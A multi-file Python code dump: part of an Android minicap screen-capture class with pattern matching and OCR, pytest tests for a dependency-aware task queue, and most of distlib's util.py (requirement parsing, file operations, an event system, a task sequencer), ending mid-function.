if not PATH in sys.path:
sys.path.insert(0, PATH)
MAX_SIZE = 5
L = logging.getLogger(__name__)
class SearchObject(object):
""" Search Object.
Attributes:
function(str): target get function.
target(str): target image filepath.
box(tuple): target position(x, y)
"""
def __init__(self, _function, _target, _box):
self.func = _function
self.target = _target
self.box = _box
def __repr__(self):
return 'SearchObject()'
def __str__(self):
return 'Target, Box : %s, %s' % (os.path.basename(self.target), self.box)
# pylint: disable=E1101
class MinicapProc(object):
""" Minicap Process
Attributes:
stream(MinicapStream): Minicap Stream Object.
service(MinicapService): Minicap Service Object.
debug(bool): Debug flag.
"""
def __init__(self, _stream, _service, debug=False):
self.module = {}
self.module['stream'] = _stream
self.module['service'] = _service
self.space = {}
self.output = Queue()
self._loop_flag = True
self._debug = debug
self._search = None
self.search_result = Queue()
self.counter = 1
self.lock = fasteners.InterProcessLock('.lockfile')
def start(self, _adb, _workspace, _package=None):
""" Minicap Process Start.
Arguments:
_adb(Android): android adaptor object.
_workspace(Workspace): workspace adaptor object.
- log : workspace.log
- tmp : workspace.tmp
- evidence : workspace.tmp.evidence
- reference : workspace.tmp.reference
"""
self.module['adb'] = _adb
self.module['workspace'] = _workspace
self.module['workspace'].mkdir('tmp')
self.space['log'] = self.module['workspace'].mkdir('log')
if _package is None:
self.space['tmp'] = self.module['workspace'].mkdir('tmp')
self.space['tmp.evidence'] = self.module['workspace'].mkdir('tmp\\evidence')
self.space['tmp.reference'] = self.module['workspace'].mkdir('tmp\\reference')
self.space['tmp.video'] = self.module['workspace'].mkdir('tmp\\video')
else:
self.space['tmp'] = self.module['workspace'].mkdir('tmp\\%s' % _package)
self.space['tmp.evidence'] = self.module['workspace'].mkdir('tmp\\%s\\evidence' % _package)
self.space['tmp.reference'] = self.module['workspace'].mkdir('tmp\\%s\\reference' % _package)
self.space['tmp.video'] = self.module['workspace'].mkdir('tmp\\%s\\video' % _package)
self.module['service'].start(self.module['adb'], self.space['log'])
time.sleep(1)
self.module['adb'].forward('tcp:%s localabstract:minicap' % str(self.module['stream'].get_port()))
self.module['stream'].start()
threading.Thread(target=self.main_loop).start()
def finish(self):
""" Minicap Process Finish.
"""
self._loop_flag = False
time.sleep(1)
self.module['stream'].finish()
if 'service' in self.module and self.module['service'] is not None:
self.module['service'].stop()
def get_d(self) -> int:
""" Get output queue size.
Returns:
size(int): output queue size.
"""
return self.output.qsize()
def get_frame(self) -> object:
""" Get frame image in output.
Returns:
objects(object): image data.
"""
return self.output.get()
def __save(self, filename, data):
""" Save framedata in files.
Arguments:
filename(str): saved filename.
data(object): save framedata.
"""
with open(filename, 'wb') as f:
f.write(data)
f.flush()
def __save_cv(self, filename, img_cv) -> str:
""" Save framedata in files. (opencv)
Arguments:
filename(str): saved filename.
img_cv(numpy.ndarray): framedata(opencv).
Returns:
filepath(str): filepath
"""
return filename if cv2.imwrite(filename, img_cv) else None
def __save_evidence(self, number, data):
""" Save Evidence Data.
Arguments:
number(int): counter number.
data(object): save framedata.
"""
zpnum = '{0:08d}'.format(int(number))
if 'tmp.evidence' in self.space:
self.__save_cv(os.path.join(self.space['tmp.evidence'], 'image_%s.png' % str(zpnum)), data)
def __search(self, func, target, box=None, _timeout=5) -> object:
""" Search Object.
Arguments:
func(str): function name.
- capture, patternmatch, ocr.
target(object): Target Object. only capture, filename.
box(tuple): box object. (x, y, width, height)
_timeout(int): Expired Time. default : 5.
Returns:
result(object): return target.
"""
with self.lock:
self._search = SearchObject(func, target, box)
result = self.search_result.get(timeout=_timeout)
self._search = None
return result
def capture_image(self, filename, _timeout=5) -> str:
""" Capture Image File.
Arguments:
filename(str): filename.
_timeout(int): Expired Time. default : 5.
Returns:
result(str): filename
"""
return self.__search('capture', filename, None)
def search_pattern(self, target, box=None, _timeout=5):
""" Search Pattern Match File.
Arguments:
target(str): target file path.
box(tuple): target search box.
_timeout(int): timeout.
Returns:
result(tuple): search pattern point.
"""
return self.__search('patternmatch', target, box, _timeout)
def search_ocr(self, box=None, _timeout=5):
""" Search OCR File.
Arguments:
box(tuple): target search box.
_timeout(int): timeout.
Returns:
result(tuple): search pattern point.
"""
return self.__search('ocr', 'dummy', box, _timeout)
def main_loop(self):
""" Minicap Process Main Loop.
"""
if self._debug:
cv2.namedWindow('debug')
while self._loop_flag:
data = self.module['stream'].picture.get()
save_flag = False
image_pil = Image.open(io.BytesIO(data))
image_cv = cv2.cvtColor(np.asarray(image_pil), cv2.COLOR_RGB2BGR)
if self._search is not None:
if self._search.func == 'capture':
outputfile = os.path.join(self.space['tmp'], self._search.target)
result = self.__save_cv(outputfile, image_cv)
self.search_result.put(result)
elif self._search.func == 'patternmatch':
result, image_cv = Picture.search_pattern(image_cv, self._search.target, self._search.box,
self.space['tmp'])
self.search_result.put(result)
save_flag = True
elif self._search.func == 'ocr':
result, image_cv = Ocr.img_to_string(image_cv, self._search.box, self.space['tmp'])
self.search_result.put(result)
save_flag = True
else:
L.warning('Could not find function : %s', self._search.func)
if (not self.counter % 5) or save_flag:
self.__save_evidence(self.counter / 5, image_cv)
if self._debug:
if self.module['adb'] is None:
resize_image_cv = cv2.resize(image_cv, (640, 360))
else:
h = int(int(self.module['adb'].get().MINICAP_WIDTH) / 2)
w = int(int(self.module['adb'].get().MINICAP_HEIGHT) / 2)
if not int(self.module['adb'].get().ROTATE):
resize_image_cv = cv2.resize(image_cv, (h, w))
else:
resize_image_cv = cv2.resize(image_cv, (w, h))
cv2.imshow('debug', resize_image_cv)
key = cv2.waitKey(5)
if key == 27:
break
self.counter += 1
if self._debug:
cv2.destroyAllWindows()
|
test_dependentqueue.py
|
from multiprocessing import Manager, Process
from queue import Queue, Empty
import logging
from ctypes import c_int
import time
import pytest
from tx.functional.either import Left, Right
from tx.functional.maybe import Just
from tx.parallex.dependentqueue import DependentQueue, Node
from tx.readable_log import getLogger
from .test_utils import object_store, manager
logger = getLogger(__name__, logging.DEBUG)
def test_dep(manager, object_store):
dq = DependentQueue(manager, None, object_store)
dq.init_thread()
id3 = dq.put(3, names={"a"})
id2 = dq.put(2, depends_on={id3: {"a"}}, names={"b"})
id1 = dq.put(1, depends_on={id3: {"a"}, id2: {"b"}})
n, r, sr, f1 = dq.get(block=True)
assert n == 3
assert r == {}
dq.complete(f1, Right({"a": 6}))
n, r, sr, f2 = dq.get(block=True)
assert n == 2
assert r == {"a": 6}
dq.complete(f2, Right({"b": 5}))
n, r, sr, f = dq.get(block=True)
assert n == 1
assert r == {"b": 5, "a": 6}
dq.complete(f, Right({"c": 4}))
n, r, sr, f = dq.get(block=True)
assert n is None
def test_dep_error(manager, object_store):
dq = DependentQueue(manager, None, object_store)
dq.init_thread()
id3 = dq.put(3, names={"a"})
id2 = dq.put(2, depends_on={id3: {"a"}}, names={"b"})
id1 = dq.put(1, depends_on={id3: {"a"}, id2: {"b"}})
n, r, sr, f1 = dq.get(block=True)
assert n == 3
assert r == {}
dq.complete(f1, Right({"a": Left("a")}))
n, r, sr, f2 = dq.get(block=True)
assert n == 2
assert r == {"a": Left("a")}
def test_dep_error(manager, object_store):
dq = DependentQueue(manager, None, object_store)
dq.init_thread()
id3 = dq.put(3, names={"a"})
id2 = dq.put(2, depends_on={id3: {"a"}}, names={"b"})
id1 = dq.put(1, depends_on={id3: {"a"}, id2: {"b"}})
n, r, sr, f1 = dq.get(block=True)
assert n == 3
assert r == {}
dq.complete(f1, Left("a"))
n, r, sr, f2 = dq.get(block=True)
assert n == 2
assert r == {"a": Left("a")}
def test_eoq(manager, object_store):
dq = DependentQueue(manager, 2, object_store)
dq.init_thread()
def dq_get(v):
logger.debug("before")
v.value, _, _, _ = dq.get()
logger.debug("after")
id3 = dq.put(2)
logger.debug("get next node")
n, _, _, f1 = dq.get(block=True)
logger.debug("next node found")
v = manager.Value(c_int, 1)
p = Process(target=dq_get, args=(v,))
logger.debug("start process")
p.start()
time.sleep(1)
logger.debug("process running")
dq.complete(f1, Just({"a":6}))
logger.debug("queue completed")
p.join()
assert v.value == 2
def test_eoq_2(manager, object_store):
dq = DependentQueue(manager, 2, object_store)
dq.init_thread()
id3 = dq.put(3)
n, r, sr, f1 = dq.get(block=True)
assert n == 3
assert r == {}
dq.complete(f1, Just({"a": 6}))
n, r, sr, f = dq.get(block=True)
assert n == 2
# def test_eoq_3():
#
# dq = DependentQueue(True)
# n, r, sr, f = dq.get(block=False)
# assert n == 2
# n, r, sr, f = dq.get(block=True)
# assert n == 2
|
util.py
|
#
# Copyright (C) 2012-2013 The Python Software Foundation.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import codecs
from collections import deque
import contextlib
import csv
from glob import iglob as std_iglob
import io
import json
import logging
import os
import py_compile
import re
import shutil
import socket
import ssl
import subprocess
import sys
import tarfile
import tempfile
try:
import threading
except ImportError:
import dummy_threading as threading
import time
from . import DistlibException
from .compat import (string_types, text_type, shutil, raw_input, StringIO,
cache_from_source, urlopen, httplib, xmlrpclib, splittype,
HTTPHandler, HTTPSHandler as BaseHTTPSHandler,
BaseConfigurator, valid_ident, Container, configparser,
URLError, match_hostname, CertificateError, ZipFile)
logger = logging.getLogger(__name__)
#
# Requirement parsing code for name + optional constraints + optional extras
#
# e.g. 'foo >= 1.2, < 2.0 [bar, baz]'
#
# The regex can seem a bit hairy, so we build it up out of smaller pieces
# which are manageable.
#
COMMA = r'\s*,\s*'
COMMA_RE = re.compile(COMMA)
IDENT = r'(\w|[.-])+'
EXTRA_IDENT = r'(\*|:(\*|\w+):|' + IDENT + ')'
VERSPEC = IDENT + r'\*?'
RELOP = '([<>=!~]=)|[<>]'
#
# The first relop is optional - if absent, will be taken as '~='
#
BARE_CONSTRAINTS = ('(' + RELOP + r')?\s*(' + VERSPEC + ')(' + COMMA + '(' +
RELOP + r')\s*(' + VERSPEC + '))*')
DIRECT_REF = '(from\s+(?P<diref>.*))'
#
# Either the bare constraints or the bare constraints in parentheses
#
CONSTRAINTS = (r'\(\s*(?P<c1>' + BARE_CONSTRAINTS + '|' + DIRECT_REF +
r')\s*\)|(?P<c2>' + BARE_CONSTRAINTS + '\s*)')
EXTRA_LIST = EXTRA_IDENT + '(' + COMMA + EXTRA_IDENT + ')*'
EXTRAS = r'\[\s*(?P<ex>' + EXTRA_LIST + r')?\s*\]'
REQUIREMENT = ('(?P<dn>' + IDENT + r')\s*(' + EXTRAS + r'\s*)?(\s*' +
CONSTRAINTS + ')?$')
REQUIREMENT_RE = re.compile(REQUIREMENT)
#
# Used to scan through the constraints
#
RELOP_IDENT = '(?P<op>' + RELOP + r')\s*(?P<vn>' + VERSPEC + ')'
RELOP_IDENT_RE = re.compile(RELOP_IDENT)
def parse_requirement(s):
def get_constraint(m):
d = m.groupdict()
return d['op'], d['vn']
result = None
m = REQUIREMENT_RE.match(s)
if m:
d = m.groupdict()
name = d['dn']
cons = d['c1'] or d['c2']
if not d['diref']:
url = None
else:
# direct reference
cons = None
url = d['diref'].strip()
if not cons:
cons = None
constr = ''
rs = d['dn']
else:
if cons[0] not in '<>!=':
cons = '~=' + cons
iterator = RELOP_IDENT_RE.finditer(cons)
cons = [get_constraint(m) for m in iterator]
rs = '%s (%s)' % (name, ', '.join(['%s %s' % con for con in cons]))
if not d['ex']:
extras = None
else:
extras = COMMA_RE.split(d['ex'])
result = Container(name=name, constraints=cons, extras=extras,
requirement=rs, source=s, url=url)
return result
def get_resources_dests(resources_root, rules):
"""Find destinations for resources files"""
def get_rel_path(base, path):
# normalizes and returns a lstripped-/-separated path
base = base.replace(os.path.sep, '/')
path = path.replace(os.path.sep, '/')
assert path.startswith(base)
return path[len(base):].lstrip('/')
destinations = {}
for base, suffix, dest in rules:
prefix = os.path.join(resources_root, base)
for abs_base in iglob(prefix):
abs_glob = os.path.join(abs_base, suffix)
for abs_path in iglob(abs_glob):
resource_file = get_rel_path(resources_root, abs_path)
if dest is None: # remove the entry if it was here
destinations.pop(resource_file, None)
else:
rel_path = get_rel_path(abs_base, abs_path)
rel_dest = dest.replace(os.path.sep, '/').rstrip('/')
destinations[resource_file] = rel_dest + '/' + rel_path
return destinations
def in_venv():
if hasattr(sys, 'real_prefix'):
# virtualenv venvs
result = True
else:
# PEP 405 venvs
result = sys.prefix != getattr(sys, 'base_prefix', sys.prefix)
return result
def get_executable():
if sys.platform == 'darwin' and ('__VENV_LAUNCHER__'
in os.environ):
result = os.environ['__VENV_LAUNCHER__']
else:
result = sys.executable
return result
def proceed(prompt, allowed_chars, error_prompt=None, default=None):
p = prompt
while True:
s = raw_input(p)
p = prompt
if not s and default:
s = default
if s:
c = s[0].lower()
if c in allowed_chars:
break
if error_prompt:
p = '%c: %s\n%s' % (c, error_prompt, prompt)
return c
def extract_by_key(d, keys):
if isinstance(keys, string_types):
keys = keys.split()
result = {}
for key in keys:
if key in d:
result[key] = d[key]
return result
def read_exports(stream):
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getreader('utf-8')(stream)
# Try to load as JSON, falling back on legacy format
data = stream.read()
stream = StringIO(data)
try:
data = json.load(stream)
result = data['exports']
for group, entries in result.items():
for k, v in entries.items():
s = '%s = %s' % (k, v)
entry = get_export_entry(s)
assert entry is not None
entries[k] = entry
return result
except Exception:
stream.seek(0, 0)
cp = configparser.ConfigParser()
if hasattr(cp, 'read_file'):
cp.read_file(stream)
else:
cp.readfp(stream)
result = {}
for key in cp.sections():
result[key] = entries = {}
for name, value in cp.items(key):
s = '%s = %s' % (name, value)
entry = get_export_entry(s)
assert entry is not None
#entry.dist = self
entries[name] = entry
return result
def write_exports(exports, stream):
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getwriter('utf-8')(stream)
cp = configparser.ConfigParser()
for k, v in exports.items():
# TODO check k, v for valid values
cp.add_section(k)
for entry in v.values():
if entry.suffix is None:
s = entry.prefix
else:
s = '%s:%s' % (entry.prefix, entry.suffix)
if entry.flags:
s = '%s [%s]' % (s, ', '.join(entry.flags))
cp.set(k, entry.name, s)
cp.write(stream)
@contextlib.contextmanager
def tempdir():
td = tempfile.mkdtemp()
try:
yield td
finally:
shutil.rmtree(td)
@contextlib.contextmanager
def chdir(d):
cwd = os.getcwd()
try:
os.chdir(d)
yield
finally:
os.chdir(cwd)
@contextlib.contextmanager
def socket_timeout(seconds=15):
cto = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(seconds)
yield
finally:
socket.setdefaulttimeout(cto)
class cached_property(object):
def __init__(self, func):
self.func = func
#for attr in ('__name__', '__module__', '__doc__'):
# setattr(self, attr, getattr(func, attr, None))
def __get__(self, obj, cls=None):
if obj is None:
return self
value = self.func(obj)
object.__setattr__(obj, self.func.__name__, value)
#obj.__dict__[self.func.__name__] = value = self.func(obj)
return value
def convert_path(pathname):
"""Return 'pathname' as a name that will work on the native filesystem.
The path is split on '/' and put back together again using the current
directory separator. Needed because filenames in the setup script are
always supplied in Unix style, and have to be converted to the local
convention before we can actually use them in the filesystem. Raises
ValueError on non-Unix-ish systems if 'pathname' either starts or
ends with a slash.
"""
if os.sep == '/':
return pathname
if not pathname:
return pathname
if pathname[0] == '/':
raise ValueError("path '%s' cannot be absolute" % pathname)
if pathname[-1] == '/':
raise ValueError("path '%s' cannot end with '/'" % pathname)
paths = pathname.split('/')
while os.curdir in paths:
paths.remove(os.curdir)
if not paths:
return os.curdir
return os.path.join(*paths)
class FileOperator(object):
def __init__(self, dry_run=False):
self.dry_run = dry_run
self.ensured = set()
self._init_record()
def _init_record(self):
self.record = False
self.files_written = set()
self.dirs_created = set()
def record_as_written(self, path):
if self.record:
self.files_written.add(path)
def newer(self, source, target):
"""Tell if the target is newer than the source.
Returns true if 'source' exists and is more recently modified than
'target', or if 'source' exists and 'target' doesn't.
Returns false if both exist and 'target' is the same age or younger
than 'source'. Raise PackagingFileError if 'source' does not exist.
Note that this test is not very accurate: files created in the same
second will have the same "age".
"""
if not os.path.exists(source):
raise DistlibException("file '%r' does not exist" %
os.path.abspath(source))
if not os.path.exists(target):
return True
return os.stat(source).st_mtime > os.stat(target).st_mtime
def copy_file(self, infile, outfile, check=True):
"""Copy a file respecting dry-run and force flags.
"""
self.ensure_dir(os.path.dirname(outfile))
logger.info('Copying %s to %s', infile, outfile)
if not self.dry_run:
msg = None
if check:
if os.path.islink(outfile):
msg = '%s is a symlink' % outfile
elif os.path.exists(outfile) and not os.path.isfile(outfile):
msg = '%s is a non-regular file' % outfile
if msg:
raise ValueError(msg + ' which would be overwritten')
shutil.copyfile(infile, outfile)
self.record_as_written(outfile)
def copy_stream(self, instream, outfile, encoding=None):
assert not os.path.isdir(outfile)
self.ensure_dir(os.path.dirname(outfile))
logger.info('Copying stream %s to %s', instream, outfile)
if not self.dry_run:
if encoding is None:
outstream = open(outfile, 'wb')
else:
outstream = codecs.open(outfile, 'w', encoding=encoding)
try:
shutil.copyfileobj(instream, outstream)
finally:
outstream.close()
self.record_as_written(outfile)
def write_binary_file(self, path, data):
self.ensure_dir(os.path.dirname(path))
if not self.dry_run:
with open(path, 'wb') as f:
f.write(data)
self.record_as_written(path)
def write_text_file(self, path, data, encoding):
self.ensure_dir(os.path.dirname(path))
if not self.dry_run:
with open(path, 'wb') as f:
f.write(data.encode(encoding))
self.record_as_written(path)
def set_mode(self, bits, mask, files):
if os.name == 'posix' or (os.name == 'java' and os._name == 'posix'):
# Set the executable bits (owner, group, and world) on
# all the files specified.
for f in files:
if self.dry_run:
logger.info("changing mode of %s", f)
else:
mode = (os.stat(f).st_mode | bits) & mask
logger.info("changing mode of %s to %o", f, mode)
os.chmod(f, mode)
set_executable_mode = lambda s, f: s.set_mode(0o555, 0o7777, f)
def ensure_dir(self, path):
path = os.path.abspath(path)
if path not in self.ensured and not os.path.exists(path):
self.ensured.add(path)
d, f = os.path.split(path)
self.ensure_dir(d)
logger.info('Creating %s' % path)
if not self.dry_run:
os.mkdir(path)
if self.record:
self.dirs_created.add(path)
def byte_compile(self, path, optimize=False, force=False, prefix=None):
dpath = cache_from_source(path, not optimize)
logger.info('Byte-compiling %s to %s', path, dpath)
if not self.dry_run:
if force or self.newer(path, dpath):
if not prefix:
diagpath = None
else:
assert path.startswith(prefix)
diagpath = path[len(prefix):]
py_compile.compile(path, dpath, diagpath, True) # raise error
self.record_as_written(dpath)
return dpath
def ensure_removed(self, path):
if os.path.exists(path):
if os.path.isdir(path) and not os.path.islink(path):
logger.debug('Removing directory tree at %s', path)
if not self.dry_run:
shutil.rmtree(path)
if self.record:
if path in self.dirs_created:
self.dirs_created.remove(path)
else:
if os.path.islink(path):
s = 'link'
else:
s = 'file'
logger.debug('Removing %s %s', s, path)
if not self.dry_run:
os.remove(path)
if self.record:
if path in self.files_written:
self.files_written.remove(path)
def is_writable(self, path):
result = False
while not result:
if os.path.exists(path):
result = os.access(path, os.W_OK)
break
parent = os.path.dirname(path)
if parent == path:
break
path = parent
return result
def commit(self):
"""
Commit recorded changes, turn off recording, return
changes.
"""
assert self.record
result = self.files_written, self.dirs_created
self._init_record()
return result
def rollback(self):
if not self.dry_run:
for f in list(self.files_written):
if os.path.exists(f):
os.remove(f)
# dirs should all be empty now, except perhaps for
# __pycache__ subdirs
# reverse so that subdirs appear before their parents
dirs = sorted(self.dirs_created, reverse=True)
for d in dirs:
flist = os.listdir(d)
if flist:
assert flist == ['__pycache__']
sd = os.path.join(d, flist[0])
os.rmdir(sd)
os.rmdir(d) # should fail if non-empty
self._init_record()
def resolve(module_name, dotted_path):
if module_name in sys.modules:
mod = sys.modules[module_name]
else:
mod = __import__(module_name)
if dotted_path is None:
result = mod
else:
parts = dotted_path.split('.')
result = getattr(mod, parts.pop(0))
for p in parts:
result = getattr(result, p)
return result
class ExportEntry(object):
def __init__(self, name, prefix, suffix, flags):
self.name = name
self.prefix = prefix
self.suffix = suffix
self.flags = flags
@cached_property
def value(self):
return resolve(self.prefix, self.suffix)
def __repr__(self):
return '<ExportEntry %s = %s:%s %s>' % (self.name, self.prefix,
self.suffix, self.flags)
def __eq__(self, other):
if not isinstance(other, ExportEntry):
result = False
else:
result = (self.name == other.name and
self.prefix == other.prefix and
self.suffix == other.suffix and
self.flags == other.flags)
return result
__hash__ = object.__hash__
ENTRY_RE = re.compile(r'''(?P<name>(\w|[-.])+)
\s*=\s*(?P<callable>(\w+)([:\.]\w+)*)
\s*(\[\s*(?P<flags>\w+(=\w+)?(,\s*\w+(=\w+)?)*)\s*\])?
''', re.VERBOSE)
def get_export_entry(specification):
m = ENTRY_RE.search(specification)
if not m:
result = None
if '[' in specification or ']' in specification:
raise DistlibException('Invalid specification '
'%r' % specification)
else:
d = m.groupdict()
name = d['name']
path = d['callable']
colons = path.count(':')
if colons == 0:
prefix, suffix = path, None
else:
if colons != 1:
raise DistlibException('Invalid specification '
'%r' % specification)
prefix, suffix = path.split(':')
flags = d['flags']
if flags is None:
if '[' in specification or ']' in specification:
raise DistlibException('Invalid specification '
'%r' % specification)
flags = []
else:
flags = [f.strip() for f in flags.split(',')]
result = ExportEntry(name, prefix, suffix, flags)
return result
def get_cache_base(suffix=None):
"""
Return the default base location for distlib caches. If the directory does
not exist, it is created. Use the suffix provided for the base directory,
and default to '.distlib' if it isn't provided.
On Windows, if LOCALAPPDATA is defined in the environment, then it is
assumed to be a directory, and will be the parent directory of the result.
On POSIX, and on Windows if LOCALAPPDATA is not defined, the user's home
directory - using os.expanduser('~') - will be the parent directory of
the result.
The result is just the directory '.distlib' in the parent directory as
determined above, or with the name specified with ``suffix``.
"""
if suffix is None:
suffix = '.distlib'
if os.name == 'nt' and 'LOCALAPPDATA' in os.environ:
result = os.path.expandvars('$localappdata')
else:
# Assume posix, or old Windows
result = os.path.expanduser('~')
result = os.path.join(result, suffix)
# we use 'isdir' instead of 'exists', because we want to
# fail if there's a file with that name
if os.path.isdir(result):
usable = os.access(result, os.W_OK)
if not usable:
logger.warning('Directory exists but is not writable: %s', result)
else:
try:
os.makedirs(result)
usable = True
except OSError:
logger.warning('Unable to create %s', result, exc_info=True)
usable = False
if not usable:
result = tempfile.mkdtemp()
logger.warning('Default location unusable, using %s', result)
return result
def path_to_cache_dir(path):
"""
Convert an absolute path to a directory name for use in a cache.
The algorithm used is:
#. On Windows, any ``':'`` in the drive is replaced with ``'---'``.
#. Any occurrence of ``os.sep`` is replaced with ``'--'``.
#. ``'.cache'`` is appended.
"""
d, p = os.path.splitdrive(os.path.abspath(path))
if d:
d = d.replace(':', '---')
p = p.replace(os.sep, '--')
return d + p + '.cache'
def ensure_slash(s):
if not s.endswith('/'):
return s + '/'
return s
def parse_credentials(netloc):
username = password = None
if '@' in netloc:
prefix, netloc = netloc.split('@', 1)
if ':' not in prefix:
username = prefix
else:
username, password = prefix.split(':', 1)
return username, password, netloc
def get_process_umask():
result = os.umask(0o22)
os.umask(result)
return result
def is_string_sequence(seq):
result = True
i = None
for i, s in enumerate(seq):
if not isinstance(s, string_types):
result = False
break
assert i is not None
return result
PROJECT_NAME_AND_VERSION = re.compile('([a-z0-9_]+([.-][a-z_][a-z0-9_]*)*)-'
'([a-z0-9_.+-]+)', re.I)
PYTHON_VERSION = re.compile(r'-py(\d\.?\d?)')
def split_filename(filename, project_name=None):
"""
Extract name, version, python version from a filename (no extension)
Return name, version, pyver or None
"""
result = None
pyver = None
m = PYTHON_VERSION.search(filename)
if m:
pyver = m.group(1)
filename = filename[:m.start()]
if project_name and len(filename) > len(project_name) + 1:
m = re.match(re.escape(project_name) + r'\b', filename)
if m:
n = m.end()
result = filename[:n], filename[n + 1:], pyver
if result is None:
m = PROJECT_NAME_AND_VERSION.match(filename)
if m:
result = m.group(1), m.group(3), pyver
return result
# Allow spaces in name because of legacy dists like "Twisted Core"
NAME_VERSION_RE = re.compile(r'(?P<name>[\w .-]+)\s*'
r'\(\s*(?P<ver>[^\s)]+)\)$')
def parse_name_and_version(p):
"""
A utility method used to get name and version from a string.
From e.g. a Provides-Dist value.
:param p: A value in a form 'foo (1.0)'
:return: The name and version as a tuple.
"""
m = NAME_VERSION_RE.match(p)
if not m:
raise DistlibException('Ill-formed name/version string: \'%s\'' % p)
d = m.groupdict()
return d['name'].strip().lower(), d['ver']
def get_extras(requested, available):
result = set()
requested = set(requested or [])
available = set(available or [])
if '*' in requested:
requested.remove('*')
result |= available
for r in requested:
if r == '-':
result.add(r)
elif r.startswith('-'):
unwanted = r[1:]
if unwanted not in available:
logger.warning('undeclared extra: %s' % unwanted)
if unwanted in result:
result.remove(unwanted)
else:
if r not in available:
logger.warning('undeclared extra: %s' % r)
result.add(r)
return result
#
# Extended metadata functionality
#
def _get_external_data(url):
result = {}
try:
# urlopen might fail if it runs into redirections,
# because of Python issue #13696. Fixed in locators
# using a custom redirect handler.
resp = urlopen(url)
headers = resp.info()
if headers.get('Content-Type') != 'application/json':
logger.debug('Unexpected response for JSON request')
else:
reader = codecs.getreader('utf-8')(resp)
#data = reader.read().decode('utf-8')
#result = json.loads(data)
result = json.load(reader)
except Exception as e:
logger.exception('Failed to get external data for %s: %s', url, e)
return result
def get_project_data(name):
url = ('https://www.red-dove.com/pypi/projects/'
'%s/%s/project.json' % (name[0].upper(), name))
result = _get_external_data(url)
return result
def get_package_data(name, version):
url = ('https://www.red-dove.com/pypi/projects/'
'%s/%s/package-%s.json' % (name[0].upper(), name, version))
return _get_external_data(url)
class EventMixin(object):
"""
A very simple publish/subscribe system.
"""
def __init__(self):
self._subscribers = {}
def add(self, event, subscriber, append=True):
"""
Add a subscriber for an event.
:param event: The name of an event.
:param subscriber: The subscriber to be added (and called when the
event is published).
:param append: Whether to append or prepend the subscriber to an
existing subscriber list for the event.
"""
subs = self._subscribers
if event not in subs:
subs[event] = deque([subscriber])
else:
sq = subs[event]
if append:
sq.append(subscriber)
else:
sq.appendleft(subscriber)
def remove(self, event, subscriber):
"""
Remove a subscriber for an event.
:param event: The name of an event.
:param subscriber: The subscriber to be removed.
"""
subs = self._subscribers
if event not in subs:
raise ValueError('No subscribers: %r' % event)
subs[event].remove(subscriber)
def get_subscribers(self, event):
"""
Return an iterator for the subscribers for an event.
:param event: The event to return subscribers for.
"""
return iter(self._subscribers.get(event, ()))
def publish(self, event, *args, **kwargs):
"""
Publish a event and return a list of values returned by its
subscribers.
:param event: The event to publish.
:param args: The positional arguments to pass to the event's
subscribers.
:param kwargs: The keyword arguments to pass to the event's
subscribers.
"""
result = []
for subscriber in self.get_subscribers(event):
try:
value = subscriber(event, *args, **kwargs)
except Exception:
logger.exception('Exception during event publication')
value = None
result.append(value)
logger.debug('publish %s: args = %s, kwargs = %s, result = %s',
event, args, kwargs, result)
return result
#
# Simple sequencing
#
class Sequencer(object):
def __init__(self):
self._preds = {}
self._succs = {}
self._nodes = set() # nodes with no preds/succs
def add_node(self, node):
self._nodes.add(node)
def remove_node(self, node, edges=False):
if node in self._nodes:
self._nodes.remove(node)
if edges:
for p in set(self._preds.get(node, ())):
self.remove(p, node)
for s in set(self._succs.get(node, ())):
self.remove(node, s)
# Remove empties
for k, v in list(self._preds.items()):
if not v:
del self._preds[k]
for k, v in list(self._succs.items()):
if not v:
del self._succs[k]
def add(self, pred, succ):
assert pred != succ
self._preds.setdefault(succ, set()).add(pred)
self._succs.setdefault(pred, set()).add(succ)
def remove(self, pred, succ):
assert pred != succ
try:
preds = self._preds[succ]
succs = self._succs[pred]
except KeyError:
raise ValueError('%r not a successor of anything' % succ)
try:
preds.remove(pred)
succs.remove(succ)
except KeyError:
raise ValueError('%r not a successor of %r' % (succ, pred))
def is_step(self, step):
return (step in self._preds or step in self._succs or
step in self._nodes)
def get_steps(self, final):
if not self.is_step(final):
raise ValueError('Unknown: %r' % final)
result = []
todo = []
seen = set()
todo.append(final)
while todo:
step = todo.pop(0)
if step in seen:
# if a step was already seen,
# move it to the end (so it will appear earlier
# when reversed on return) ... but not for the
# final step, as that would be confusing for
# users
if step != final:
result.remove(step)
result.append(step)
else:
seen.add(step)
result.append(step)
preds = self._preds.get(step, ())
todo.extend(preds)
return reversed(result)
@property
def strong_connections(self):
#http://en.wikipedia.org/wiki/Tarjan%27s_strongly_connected_components_algorithm
index_counter = [0]
stack = []
lowlinks = {}
index = {}
result = []
graph = self._succs
def strongconnect(node):
# set the depth index for this node to the smallest unused index
index[node] = index_counter[0]
lowlinks[node] = index_counter[0]
index_counter[0] += 1
stack.append(node)
# Consider successors
try:
successors = graph[node]
except Exception:
successors = []
for successor in successors:
if successor not in lowlinks:
# Successor has not yet been visited
strongconnect(successor)
lowlinks[node] = min(lowlinks[node],lowlinks[successor])
elif successor in stack:
# the successor is in the stack and hence in the current
# strongly connected component (SCC)
lowlinks[node] = min(lowlinks[node],index[successor])
# If `node` is a root node, pop the stack and generate an SCC
if lowlinks[node] == index[node]:
connected_component = []
while True:
successor = stack.pop()
connected_component.append(successor)
if successor == node: break
component = tuple(connected_component)
# storing the result
result.append(component)
for node in graph:
if node not in lowlinks:
strongconnect(node)
return result
@property
def dot(self):
result = ['digraph G {']
for succ in self._preds:
preds = self._preds[succ]
for pred in preds:
result.append(' %s -> %s;' % (pred, succ))
for node in self._nodes:
result.append(' %s;' % node)
result.append('}')
return '\n'.join(result)
#
# Unarchiving functionality for zip, tar, tgz, tbz, whl
#
ARCHIVE_EXTENSIONS = ('.tar.gz', '.tar.bz2', '.tar', '.zip',
'.tgz', '.tbz', '.whl')
def unarchive(archive_filename, dest_dir, format=None, check=True):
def check_path(path):
if not isinstance(path, text_type):
path = path.decode('utf-8')
p = os.path.abspath(os.path.join(dest_dir, path))
if not p.startswith(dest_dir) or p[plen] != os.sep:
raise ValueError('path outside destination: %r' % p)
dest_dir = os.path.abspath(dest_dir)
plen = len(dest_dir)
archive = None
if format is None:
if archive_filename.endswith(('.zip', '.whl')):
format = 'zip'
elif archive_filename.endswith(('.tar.gz', '.tgz')):
format = 'tgz'
